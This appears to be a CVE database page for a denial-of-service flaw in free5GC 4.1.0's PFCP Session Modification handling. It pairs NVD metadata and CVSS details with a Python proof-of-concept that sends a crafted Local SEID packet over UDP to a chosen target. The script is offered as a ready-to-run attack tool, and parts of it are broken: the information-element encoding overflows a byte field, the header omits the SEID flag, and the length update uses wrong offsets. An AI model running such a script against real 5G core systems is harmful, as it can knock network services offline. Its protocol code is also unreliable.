CVE-2025-65561

Description

An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:* - VULNERABLE

free5GC < 4.1.0 (可能受影响)

free5GC = 4.1.0 (确认受影响)

go-upf (相关组件可能受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65561 PoC - free5GC LocalNode.Sess DoS
This PoC demonstrates sending a crafted PFCP Session Modification Request
with malicious Local SEID to trigger denial of service in free5GC 4.1.0
"""

import socket
import struct
import random

def create_pfcp_header(msg_type, flags=0x20):
    """Create PFCP header
    Flags: Version(3 bits) = 1, MTI(1 bit) = 0, SPM(1 bit) = 1 (Set Message Type)
    """
    version_flags = (1 << 5) | flags  # Version=1, SPM=1
    message_type = msg_type
    message_length = 0  # Will be updated with actual length
    return struct.pack('!BBH', version_flags, message_type, message_length)

def create_ie(ie_type, ie_data):
    """Create Information Element with Type-Length-Value format"""
    ie_type_encoded = ie_type << 4 | 0x01  # Type and length format
    ie_length = len(ie_data)
    # IE header: Type(4 bits) + Length(4 bits) + Type extension(8 bits) + Length(16 bits)
    ie_header = struct.pack('!BBH', ie_type_encoded, 0, ie_length)
    return ie_header + ie_data

def create_malicious_local_seid():
    """Create malicious Local SEID that may trigger vulnerability"""
    # Use invalid or unexpected SEID value
    return struct.pack('!Q', random.randint(0xFFFFFFFF00000000, 0xFFFFFFFFFFFFFFFE))

def create_pfcp_session_modification_request():
    """Create PFCP Session Modification Request with malicious Local SEID"""
    # PFCP Header: Session Modification Request (Type 51)
    pfcp_header = create_pfcp_header(51)
    
    # Create IE: Node ID (IE Type 77)
    node_id = b'\x00\x00\x00\x01'  # IPv4 Node ID
    ie_node_id = create_ie(77, node_id)
    
    # Create malicious Local SEID (IE Type 0x59)
    malicious_seid = create_malicious_local_seid()
    ie_local_seid = create_ie(0x59, malicious_seid)
    
    # Build message
    message = pfcp_header + ie_node_id + ie_local_seid
    
    # Update message length in header (excluding first 4 bytes)
    msg_len = len(message) - 4
    message = message[:4] + struct.pack('!H', msg_len) + message[6:]
    
    return message

def exploit(target_ip, target_port=8805):
    """Send malicious PFCP packet to trigger vulnerability"""
    print(f"[*] Target: {target_ip}:{target_port}")
    print("[*] Creating malicious PFCP Session Modification Request...")
    
    payload = create_pfcp_session_modification_request()
    print(f"[*] Payload length: {len(payload)} bytes")
    print(f"[*] Payload (hex): {payload.hex()}")
    
    try:
        print("[*] Sending malicious packet...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(payload, (target_ip, target_port))
        print("[+] Packet sent successfully")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65561
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65561
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65561/
[4] VulDB https://vuldb.com/cve/CVE-2025-65561
[5] https://github.com/free5gc/free5gc/issues/730
[6] https://github.com/free5gc/go-upf/pull/80
[7] https://github.com/free5gc/free5gc/issues/730

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65561", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.633", "lastModified": "2026-01-07T21:00:58.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4087E419-65F0-4AAD-A2F6-C24EEDC27B3B"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/730", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/free5gc/go-upf/pull/80", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/free5gc/free5gc/issues/730", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}